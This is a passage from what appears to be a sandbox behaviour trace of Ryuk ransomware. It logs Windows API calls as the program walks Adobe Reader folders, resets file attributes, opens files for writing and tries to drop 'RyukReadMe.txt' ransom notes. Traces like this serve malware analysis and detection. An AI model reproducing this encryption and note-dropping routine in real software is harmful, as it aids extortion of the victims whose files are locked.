nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.411] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.411] SetLastError (dwErrCode=0x0) [0138.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.412] GetLastError () returned 0x5 [0138.412] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.412] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.412] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.412] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.412] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.412] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.412] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\license.html", dwFileAttributes=0x80) returned 0 [0138.412] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.412] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.412] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.413] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.413] SetLastError (dwErrCode=0x0) [0138.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.413] GetLastError () returned 0x5 [0138.413] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.413] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.413] SetLastError (dwErrCode=0x0) [0138.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.413] GetLastError () returned 0x5 [0138.413] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.413] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.413] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.414] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.414] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.414] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.414] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\license.html", dwFileAttributes=0x80) returned 0 [0138.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.414] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.414] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.414] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.414] SetLastError (dwErrCode=0x0) [0138.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.415] GetLastError () returned 0x5 [0138.415] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.415] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.415] SetLastError (dwErrCode=0x0) [0138.415] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.415] GetLastError () returned 0x5 [0138.415] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.415] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.415] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.415] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.415] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.415] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.415] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\license.html", dwFileAttributes=0x80) returned 0 [0138.415] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.416] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.416] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.416] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.416] SetLastError (dwErrCode=0x0) [0138.416] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.416] GetLastError () returned 0x5 [0138.416] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.416] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.416] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.416] SetLastError (dwErrCode=0x0) [0138.416] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.416] GetLastError () returned 0x5 [0138.416] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.416] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.416] SetLastError (dwErrCode=0x0) [0138.416] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.416] GetLastError () returned 0x5 [0138.416] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.417] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.417] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.418] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.418] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.418] SetLastError (dwErrCode=0x0) [0138.418] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.418] GetLastError () returned 0x5 [0138.418] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.418] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.418] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.420] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.420] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.420] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.420] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\accessibility.CAT", dwFileAttributes=0x80) returned 0 [0138.421] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\accessibility.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\accessibility.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.421] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.421] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.421] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.422] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Acroform.CAT", dwFileAttributes=0x80) returned 0 [0138.426] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Acroform.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\acroform.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.426] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.426] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.426] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.427] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\AdobeCollabSync.CAT", dwFileAttributes=0x80) returned 0 [0138.428] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\AdobeCollabSync.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\adobecollabsync.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.428] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.428] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.428] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.428] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Annots.CAT", dwFileAttributes=0x80) returned 0 [0138.429] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Annots.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\annots.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.429] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.429] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.429] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.429] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\BRdlang32.CAT", dwFileAttributes=0x80) returned 0 [0138.430] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\BRdlang32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\brdlang32.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.430] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.431] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.431] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.431] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Checkers.CAT", dwFileAttributes=0x80) returned 0 [0138.431] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Checkers.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\checkers.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.431] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.431] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.431] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.431] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DigSig.CAT", dwFileAttributes=0x80) returned 0 [0138.432] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DigSig.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\digsig.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.432] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.432] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.432] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.433] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DVA.CAT", dwFileAttributes=0x80) returned 0 [0138.433] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DVA.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\dva.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.433] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.433] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.433] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.433] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\eBook.CAT", dwFileAttributes=0x80) returned 0 [0138.433] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\eBook.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ebook.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.433] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.433] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.434] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.434] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\EScript.CAT", dwFileAttributes=0x80) returned 0 [0138.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\EScript.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\escript.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.434] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.434] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.434] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.434] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\IA32.CAT", dwFileAttributes=0x80) returned 0 [0138.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\IA32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ia32.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.435] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.435] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.435] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.435] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\makeaccessible.CAT", dwFileAttributes=0x80) returned 0 [0138.435] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\makeaccessible.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\makeaccessible.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.435] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.435] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.435] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.435] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Multimedia.CAT", dwFileAttributes=0x80) returned 0 [0138.436] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Multimedia.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\multimedia.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.436] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.437] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.437] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.437] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\pddom.CAT", dwFileAttributes=0x80) returned 0 [0138.437] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\pddom.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\pddom.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.438] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.438] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.438] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.438] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\PPKLite.CAT", dwFileAttributes=0x80) returned 0 [0138.438] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\PPKLite.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ppklite.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.438] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.438] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.438] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.438] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\RdLang32.CAT", dwFileAttributes=0x80) returned 0 [0138.439] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\RdLang32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\rdlang32.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.439] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.439] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.439] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.439] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\ReadOutLoud.CAT", dwFileAttributes=0x80) returned 0 [0138.439] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\ReadOutLoud.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\readoutloud.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.439] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.439] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.439] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.440] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\reflow.CAT", dwFileAttributes=0x80) returned 0 [0138.440] CreateFileW (lpFileName="C:\\Program Files 